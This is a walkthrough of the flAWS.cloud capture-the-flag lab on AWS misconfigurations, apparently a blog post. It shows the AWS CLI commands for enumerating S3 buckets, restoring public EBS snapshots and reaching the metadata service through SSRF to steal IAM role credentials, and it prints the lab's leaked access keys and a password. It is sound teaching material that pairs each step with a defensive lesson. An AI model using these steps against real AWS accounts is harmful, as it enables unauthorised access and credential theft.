flAWS.cloud Walkthrough: AWS S3, IAM, EC2, and Lambda Exploitation
flAWS.cloud Walkthrough – Exploiting AWS Misconfigurations
flAWS.cloud is a hands-on CTF-style challenge created to teach cloud security professionals about real-world AWS misconfigurations and their potential exploitation. This walkthrough explains each step in detail, covering how attackers can enumerate, exploit, and escalate privileges inside AWS environments.
Pre-requisites
- AWS Account – Free tier is enough.
- AWS CLI – Install and configure with an IAM user (never use root).
- IAM User – With policies to create/manage S3, EC2, and IAM.
- Git – Required to fetch repos and explore leaked commits.
Notes
- The challenge is hosted in us-west-2.
- Some tasks require a Linux environment.
- Always cross-check AWS docs for S3, IAM, EC2, Lambda.
- Make sure EBS volumes and EC2 instances are in the same region when mounting snapshots.
- Contact me if you get stuck—I’d be happy to help!
Task 1 – Public S3 Bucket Enumeration
Without any credentials, we attempt to list the bucket:
aws s3 ls s3://flaws.cloud- Discovered secret-dd02c7c.html at:
http://flaws.cloud.s3.amazonaws.com/secret-dd02c7c.htmlSecurity Issue:
Public S3 bucket listing should never be enabled.
Exposes internal files to unauthenticated users.
Task 2 – Authenticated S3 Enumeration
- Authenticated users with “All Authenticated AWS Users” permission can enumerate buckets:
aws s3 --profile default ls s3://level2-xxxx.flaws.cloud/Discovered secret-e4443fc.html → leads to Task 3.
Security Issue:
- Misconfigured ACL allows any AWS account to list objects.
Task 3 – Secrets in Git Repository on S3
- We found a .git folder inside the bucket:
aws s3 sync s3://level3-xxxx.flaws.cloud/ .
git log
git checkout <commit-id>- Found AWS Access Keys inside access_key.txt:
access_key_id: AKIAJ366LIPB4IJKT7SA
secret_access_key: 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- Configured AWS CLI with the leaked creds:
aws configure --profile flaws
aws --profile flaws s3api list-bucketsSecurity Issue:
Never commit AWS keys to Git repos.
If leaked, revoke immediately and rotate.
Task 4 – Exploiting Public EC2 Snapshots
- Discovered an EC2 snapshot linked to IAM user backup:
aws --profile flaws ec2 describe-snapshots --owner-id 975426262029- Imported the snapshot into our account:
aws ec2 create-volume \
--availability-zone us-west-2a \
--region us-west-2 \
--snapshot-id snap-0b49342abd1bdcb89- Mounted snapshot → found setupNginx.sh with plaintext creds:
username: flaws
password: nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8MLogged into the hosted website successfully.
Security Issue:
EC2 snapshots should always be private.
Public snapshots expose sensitive data & credentials.
Task 5 – Exploiting EC2 Metadata via SSRF
- The instance was exposing AWS Instance Metadata Service (IMDS) through /proxy:
http://<ec2-public-dns>/proxy/169.254.169.254/latest/meta-data- Extracted temporary IAM role credentials:
iam/security-credentials/flaws- Exported them and accessed:
aws s3 ls s3://level6-xxxx.flaws.cloudSecurity Issue:
IMDS exposure enables SSRF → credential theft.
Applications should block access to 169.254.169.254.
Task 6 – Lambda Privilege Escalation via API Gateway
- Checked IAM role & attached policies:
aws --profile sec iam list-attached-role-policies --role-name level6
aws --profile sec lambda list-functions- Found Lambda function Level6 and API Gateway ID s33ppypa75:
aws --profile sec apigateway get-stages --rest-api-id s33ppypa75Stage: prod
- Invoked Lambda via API Gateway:
https://s33ppypa75.execute-api.us-west-2.amazonaws.com/prod/Level6- Response revealed the final endpoint:
http://theend-xxxx.flaws.cloud/d730aa2b/Challenge Completed 🎉
Security Issue:
Over-permissive IAM policies + API Gateway integration can be abused to invoke internal Lambda functions.
Always enforce least privilege & review IAM policies.
Key Security Lessons
S3 Misconfiguration → Public listing exposes sensitive files.
Git Repo Secrets → Never commit credentials.
Public Snapshots → EC2/EBS volumes can leak private data.
IMDS Exposure → Protect against SSRF attacks.
IAM Over-Permissions → Leads to privilege escalation.
API Gateway + Lambda → Can be exploited if policies are too permissive.
Conclusion
The flAWS.cloud CTF is a perfect way to understand real-world AWS security pitfalls. It highlights how a single misconfiguration (like public S3 or IMDS exposure) can cascade into full account compromise.
Best Practices to Prevent Such Exploits:
Enforce least privilege IAM policies.
Disable public S3 access by default.
Regularly audit IAM, S3, EC2, Lambda configurations.
Use tools like AWS Config, Security Hub, ScoutSuite.
Implement automated secret scanning for repos (e.g., GitLeaks, TruffleHog).
Related Reads:
Related Articles
